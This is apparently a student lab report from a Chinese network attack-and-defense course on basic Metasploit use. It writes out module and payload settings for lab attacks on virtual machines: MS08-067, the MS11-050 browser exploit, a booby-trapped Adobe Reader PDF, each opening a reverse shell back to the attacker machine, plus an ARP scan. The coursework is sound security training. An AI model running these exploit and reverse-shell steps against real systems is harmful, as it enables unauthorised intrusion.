2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用


  • 验前准备

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  • 一个主动攻击实践,如ms08-067; (1分)

  • 一个针对浏览器的攻击,如ms11-050;(1分)

  • 一个针对客户端的攻击,如Adobe;(1分)

  • 成功应用任何一个辅助模块。(0.5分)

  • 预备知识

一、MSF的六种模块

Exploit模块
是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
形象点来说就是攻击模块 Payload模块
是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。 Encoder模块
针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
不改变payload作用,但能对payload进行加工 Aux模块
能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。 Post模块
支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。
这里主要指的是攻击之后可能用到的模块 Nops模块
是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90
因为有些代码返回地址很难确认,所以在实际中有时候会填充一大段空指令,便于快速确定返回地址的位置

二、MSF常用漏洞利用命令

search name:用指定关键字搜索可以利用的漏洞模块
use exploit name:使用漏洞
show options:显示配置选项
set option name option:设置选项
show payloads:回链攻击载荷
show targets 显示目标(os版本)
set TARGET target number:设置目标版本
exploit:开始漏洞攻击
sessions -l:列出会话
sessions -i id:选择会话
sessions -k id:结束会话
Ctrl+z:把会话放到后台
Ctrl+c:结束会话
show auxiliary:显示辅助模块
use auxiliary name :使用辅助模块
set option name option:设置选项
exploit:运行模块

实验内容

  • Windows服务渗透攻击——MS08-067安全漏洞

  • 攻击机:kali;靶机:windows 2003

  • 在攻击机kali输入msfconsole进入控制台,并进入

use exploit/windows/smb/ms08_067_netapi
```界面,配置好端口号和回连ip:

set payload generic/shell_reverse_tcp //tcp反向回连

set LHOST 10.1.1.240 //攻击机ip

set LPORT 5225 //攻击端口

set RHOST 192.168.6.131 //靶机ip,特定漏洞端口已经固定

set target 0 //自动选择目标系统类型,匹配度较高

exploit //攻击


- ![image](https://wx3.sinaimg.cn/mw690/9083e509gy1g22kw58pmej20oh07bn0c.jpg) - 建立会话,攻击成功结果如下: - ![image](https://wx1.sinaimg.cn/mw690/9083e509gy1g22kw6isenj20rn06ajtw.jpg) - #### 浏览器渗透攻击——MS11-050 - 攻击机:kali;靶机:WindowsXP Professional sp2/Windows7专业版 - 在kali的```mfconsole```下进入```use windows/browser/ms11_050_mshtml_cobjectelement```,并配置好回连ip和端口号,开始监听:

set payload windows/meterpreter/reverse_http //http反向回连

set LHOST 10.1.1.240 //攻击机ip

set LPORT 5225 //攻击端口固定

set URIPATH 5225wgy //统一资源标识符路径设置

exploit


- ![image](https://wx4.sinaimg.cn/mw690/9083e509ly1g22hpnp9f1j218y0o6dks.jpg) - 在xp的浏览器输入```http://192.168.43.116:8080/5225wgy```,IE出现弹窗,警告遇到问题需关闭程序: - ![image](https://wx2.sinaimg.cn/mw690/9083e509ly1g22hpgs4xzj21910obq3z.jpg) - 将其列为可信网站之后,再次进入,则出现以下界面,攻击失败: - ![image](https://wx2.sinaimg.cn/mw690/9083e509ly1g22hpf3smlj21930jcdfy.jpg) - #### 针对Adobe Reader软件的渗透攻击——adobe_toolbutton - 攻击机:kali;靶机:windowsXP Professional sp2 ③Adobe版本:9.3 - 在kali的```msfconsole```进入```use windows/fileformat/adobe_cooltype_sing```,并配置好信息,生成攻击pdf:

set payload windows/meterpreter/reverse_tcp //tcp反向回连

set LHOST 10.1.1.240 //攻击机ip

set LPORT 5225 //攻击端口

set FILENAME 5225wgy.pdf //设置生成pdf文件的名字

exploit //攻击


- ![image](https://wx4.sinaimg.cn/mw690/9083e509gy1g22k4ulvoej20on093dh7.jpg) - 但是由于kali隐藏了部分文件夹,我们需要手动设置显示隐藏文件夹才能找到这个pdf文件(我一开始是使用mv指令移到桌面的..) - ![image](https://wx3.sinaimg.cn/mw690/9083e509ly1g235n9mlj5j20600d93ye.jpg) - 将生成的pdf文件拷贝到靶机上,在kali上输入back退出当前模块,进入监听模块,进入```use exploit/multi/handler```并配置好信息:

set payload windows/meterpreter/reverse_tcp //tcp反向连接

set LHOST 10.1.1.240 //攻击机ip

set LPORT 5225 //攻击端口固定

exploit


- ![image](https://wx2.sinaimg.cn/mw690/9083e509gy1g22k4uddn8j20mt071dg9.jpg) - 在靶机上打开5225.pdf文件: - ![image](https://wx4.sinaimg.cn/mw690/9083e509gy1g22k2iqik3j20p404zjs1.jpg) - 攻击机显示攻击成功: - ![image](https://wx3.sinaimg.cn/mw690/9083e509gy1g22k2lqo0uj20se03c0to.jpg) - 此时若关闭pdf文件,则无法攻击: - ![image](https://wx3.sinaimg.cn/mw690/9083e509gy1g22kza3tt2j20pi041myf.jpg) - #### 辅助模块的应用:arp_sweep - 攻击机:kali;靶机:windows 2008 - 使用show auxiliary查看可以运用的辅助模块(唯一): - ![image](https://wx1.sinaimg.cn/mw690/9083e509gy1g22l8v0jilj20oj0ajtch.jpg) - 使用```use auxiliary/scanner/discovery/arp_sweep```进入模块,并使用show options查看需填参数: - ![image](https://wx1.sinaimg.cn/mw690/9083e509ly1g236lvnxxqj20qr08omya.jpg) - 创建一个msf所需的数据库 - ![image](https://wx3.sinaimg.cn/mw690/9083e509ly1g236ltwu05j20oi023q2v.jpg) - exploit扫描目标机: - ![image](https://wx2.sinaimg.cn/mw690/9083e509ly1g236lukl4ij20oj04lgls.jpg) - 可见目标机正在运行的ip信息 - #### 回答问题 - 用自己的话解释什么是exploit,payload,encode - exploit: 就是利用发现的漏洞和配置好的信息攻击靶机的指令 - payload:攻击载荷,在它传到靶机中后执行相应的代码 - encode:编码器 - ### 实验中遇到的问题及解决方法 - 问题:Windows服务渗透攻击——MS08-067安全漏洞时,攻击xp proferssional失败 - ![image](https://wx4.sinaimg.cn/mw690/9083e509ly1g235n9yw0cj20ov02wjre.jpg) - 解决方案:攻击机换成win2003即可(或者更低版本) - ### 实践总结与体会 - 这次实验并不困难,但是模块太多,第一次接触有点眼花缭乱,我们发现msf的使用还是有套路可循的:进入模块->指定荷载->设置参数->发动攻击 - ### 离实战还缺些什么技术或步骤? - 还差的很远,尝试过的模块只是九牛一毛,如果要实战还需要很多时间去研究其他模块。

2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  5. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  6. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  7. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  8. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

  9. 20165308『网络对抗技术』Exp5 MSF基础应用

    20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

随机推荐

  1. sed 正则 ! 取反

    !符号表示取反,x,y!表示匹配不在x和y行号范围内的行,利用sed命令用于的阿银不在2-7之间的行 [111 sed]$ cat input [111 sed]$ sed -n '2,7!p' in ...

  2. mysql 备份报错mysqldump: [Warning] Using a password on the command line interface can be insecure.

    -------------------------------------------------------------------------------- mysql 备份报错mysqldump ...

  3. 最简单有效的关于linux下配置Git操作免登录ssh公钥

    ssh-keygen -t rsa -b 4096 -C “someone@xxx.com” 然后回车三连击… 进入目录(执行cd ~/.ssh),可以看到当前目录下多出两个文件 id_rsa.pub ...

  4. Python-Django-Ajax进阶3

    1 中间件 -是什么? 中间件顾名思义,是介于request与response处理之间的一道处理过程,相对比较轻量级,并且在全局上改变django的输入与输出.因为改变的是全局,所以需要谨慎实用,用不 ...

  5. mybatis 保存对象 参数类型

    简单介绍:保存单个对象 ,参数类型的设置,正常的话应该设置成对应的pojo,我想起了以前,不懂事时候的一个做法,其实那时候刚接触到mabatis,做新增的时候,直接就是把需要插入表中的值,放到map里 ...

  6. 在Pythonfor循环中如何获取循环次数?

    在Python的for循环里,循环遍历可以写成: for item in list: print item 它可以遍历列表中的所有元素,但是有什么方法可以知道到目前为止我循环了多少次? 想到的替代方案 ...

  7. (一)Knockout 计算属性

    1 Computed 首先,创建一个view model如下: <body> <p>The fullname is: <span data-bind="text ...

  8. Invalid tld file: "/WEB-INF/tags/xxxt.tld", see JSP 2.2 specification section 7.3.1 for more details

    错误描述 在jsp页面引入了自定义的TLD文件的时候,碰到了一个错误 Invalid tld file: "/WEB-INF/tags/xxxt.tld", see JSP 2.2 ...

  9. SQL反模式学习笔记19 使用*号,隐式的列

    目标:减少输入 反模式:捷径会让你迷失方向 使用通配符和未命名的列能够达到减少输入的目的,但是这个习惯会带来一些危害. 1.破坏代码重构:增加一列后,使用隐式的Insert插入语句报错: 2.查询中使 ...

  10. day14.生成器迭代器作业

    1.写生成器,从文件中读取内容,再每一行读取的内容前加上 ‘***’之后返回给用户 def func(filename): word = input('输入你想找的内容:') with open(fi ...